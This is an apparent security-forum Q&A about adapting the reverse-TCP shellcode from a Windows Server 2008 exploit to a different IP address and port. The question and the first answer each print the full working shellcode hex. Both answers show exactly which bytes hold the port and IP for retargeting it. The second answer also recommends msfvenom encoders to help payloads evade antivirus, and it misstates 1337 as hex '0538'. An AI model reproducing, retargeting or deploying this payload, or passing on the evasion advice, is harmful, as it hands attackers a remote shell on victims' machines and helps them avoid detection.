How to modify the hex code in the exploit to meet my requirements?

Question

I was looking into the latest exploit for Windows Server 2008 here. When I tried to modify the code to fit my needs I got stuck on this line:

# Shellcode TCP Reverse to 192.168.125.133 1337 
reversetcp_shellcode = binascii.unhexlify(b'fc4883e4f0e8c0000000415141505251564831d265488b5260488b5218488b5220488b7250480fb74a4a4d31c94831c0ac3c617c022c2041c1c90d4101c1e2ed524151488b52208b423c4801d08b80880000004885c074674801d0508b4818448b40204901d0e35648ffc9418b34884801d64d31c94831c0ac41c1c90d4101c138e075f14c034c24084539d175d858448b40244901d066418b0c48448b401c4901d0418b04884801d0415841585e595a41584159415a4883ec204152ffe05841595a488b12e957ffffff5d49be7773325f3332000041564989e64881eca00100004989e549bc02000539c0a87d8541544989e44c89f141ba4c772607ffd54c89ea68010100005941ba29806b00ffd550504d31c94d31c048ffc04889c248ffc04889c141baea0fdfe0ffd54889c76a1041584c89e24889f941ba99a57461ffd54881c44002000049b8636d640000000000415041504889e25757574d31c06a0d594150e2fc66c74424540101488d442418c600684889e6565041504150415049ffc0415049ffc84d89c14c89c141ba79cc3f86ffd54831d248ffca8b0e41ba08871d60ffd5bbf0b5a25641baa695bd9dffd54883c4283c067c0a80fbe07505bb4713726f6a00594189daffd5')

This is for the IP address "192.168.125.133" with port "1337". How can I change this "hex" code, although I am not sure if it is actually hex because it didn't convert to asci. Any help to edit the code to my IP address and the port I want?

Answer 1

You need to change the hexcode for port and IP which is 192.168.125.133 == c0.a8.7d.85 and the port 1337 is 0539

In your code you find both here:

fc4883e4f0e8c0000000415141505251564831d265488b5260488b5218488b5220488b7250480fb74a4a4d31c94831c0ac3c617c022c2041c1c90d4101c1e2ed524151488b52208b423c4801d08b80880000004885c074674801d0508b4818448b40204901d0e35648ffc9418b34884801d64d31c94831c0ac41c1c90d4101c138e075f14c034c24084539d175d858448b40244901d066418b0c48448b401c4901d0418b04884801d0415841585e595a41584159415a4883ec204152ffe05841595a488b12e957ffffff5d49be7773325f3332000041564989e64881eca00100004989e549bc0200 0539 c0a87d85 41544989e44c89f141ba4c772607ffd54c89ea68010100005941ba29806b00ffd550504d31c94d31c048ffc04889c248ffc04889c141baea0fdfe0ffd54889c76a1041584c89e24889f941ba99a57461ffd54881c44002000049b8636d640000000000415041504889e25757574d31c06a0d594150e2fc66c74424540101488d442418c600684889e6565041504150415049ffc0415049ffc84d89c14c89c141ba79cc3f86ffd54831d248ffca8b0e41ba08871d60ffd5bbf0b5a25641baa695bd9dffd54883c4283c067c0a80fbe07505bb4713726f6a00594189daffd5

Just change both values to the ones you need.

Answer 2

If you look closely, you find the port first and then the ip address in big endian. Since ports are represented as "short" integers, they are generally 2 bytes. IPv4 addresses are represented as 4 bytes, so you are looking for a 6 byte long string, or a 12 character hex string (given 2 hex chars = 1 byte of data). This would give you the string '0539c0a87d85' where '0538' is hex for 1337, and the remainder of the string contains the 4 byte values that you see in an IPv4 address (the decimal values between each period represented as hex). A simple Python command reveals that this string is found at index 232 (in the unhexlified version). Modify the six bytes there and you will customize your shellcode.

However, if your goal here is not necessarily digging into the details of shellcode and rather just replacing the shellcode with whatever your necessities are (perhaps you want something other than just a reverse shell), I would strongly recommend you take a look at the metasploit-framework, particularly the msfvenom tool. It is a great tool for generating customized shellcode and even allows you to add encoders to obfuscate the shellcode, making it harder for anti-virus engines to detect the signature. You can find more information on how to use it on Github.